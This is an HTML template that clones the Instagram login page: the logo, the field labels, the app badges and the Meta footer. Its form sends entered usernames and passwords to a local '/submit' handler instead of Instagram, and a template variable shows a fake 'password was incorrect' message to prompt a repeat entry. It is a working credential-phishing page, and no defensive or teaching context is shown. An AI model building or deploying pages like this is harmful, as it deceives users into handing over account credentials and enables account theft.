<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <link rel="shortcut icon" href="https://icones.pro/wp-content/uploads/2021/02/instagram-logo-icone4.png">
    <link rel="stylesheet" href="../static/style.css">
</head>

<body>
    <div class="container">
        <div class="box">
            <div class="heading"></div>
            <form class="login-form" action="/submit" method="post">
                <div class="field">
                    <input id="username" type="name" name="username"  placeholder="Phone number, username, or email" required />
                    <label for="username">Phone number, username, or email</label>
                </div>
                <div class="field">
                    <input id="password" type="password" name="password" placeholder="password" required />
                    <label for="password">Password</label>
                </div>
                <button type="submit" class="login-button" title="login">Log In</button>
                <div class="separator">
                    <div class="line"></div>
                    <p>OR</p>
                    <div class="line"></div>
                </div>
                <div class="other">
                    <button class="fb-login-btn" type="button">
                        <a href="http://facebook.com" style="color: #385185; font-weight: 550;">Log in with Facebook</a>
                    </button>
                    <p class="error-message" style="display:{{params["display_type"]}};" >Sorry, your password was incorrect. Please double-check your password.</p>
                    <a class="forgot-password" href="https://www.instagram.com/accounts/password/reset/">Forgot
                        password?</a>
                </div>
            </form>
        </div>
        <div class="box">
            <p>Don't have an account? <a class="signup" href="https://www.instagram.com/accounts/emailsignup/">Sign Up</a></p>
        </div>
        <div class="get">
           <p style="margin: 0;">Get the app.</p>
        </div>
        <br>
        <div class="apps">
            <a href="https://play.google.com/">
                <img src="https://static.cdninstagram.com/rsrc.php/v3/yz/r/c5Rp7Ym-Klz.png" height="40"
                    width="130"></a>&NonBreakingSpace;&NonBreakingSpace;&NonBreakingSpace;&NonBreakingSpace;&NonBreakingSpace;<a
                href="https://www.microsoft.com/">
                <img src="https://static.cdninstagram.com/rsrc.php/v3/yu/r/EHY6QnZYdNX.png" height="40" width="130"></a>
        </div>
        <br>
        <div class="footer">
            <footer>
                Meta
                About
                Blog
                Jobs
                Help
                API
                Privacy
                Terms
                Top Accounts
                Hashtags
                Locations
                Instagram Lite
                Contact Uploading & Non-Users
            </footer>
        </div>
        <div class="copyright">
            <br>
            English © 2025 Instagram from Meta
        </div>


    </div>
      
</body>

</html>
